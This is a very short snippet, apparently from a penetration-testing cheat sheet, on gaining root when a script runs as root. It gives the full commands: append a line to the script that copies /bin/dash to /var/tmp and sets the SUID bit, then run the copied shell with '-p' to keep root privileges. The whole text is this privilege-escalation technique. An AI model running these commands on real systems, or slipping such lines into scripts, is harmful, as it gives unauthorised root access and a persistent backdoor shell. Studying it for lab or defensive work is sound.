### If the script is running to root itself : ---we can.......---- >>> echo “ cp /bin/dash /var/tmp/dash ; chmod u+s /var/tmp/dash” >> script.sh >>> cd /var/tmp/ >>> ./dash -p
Last updated 2 years ago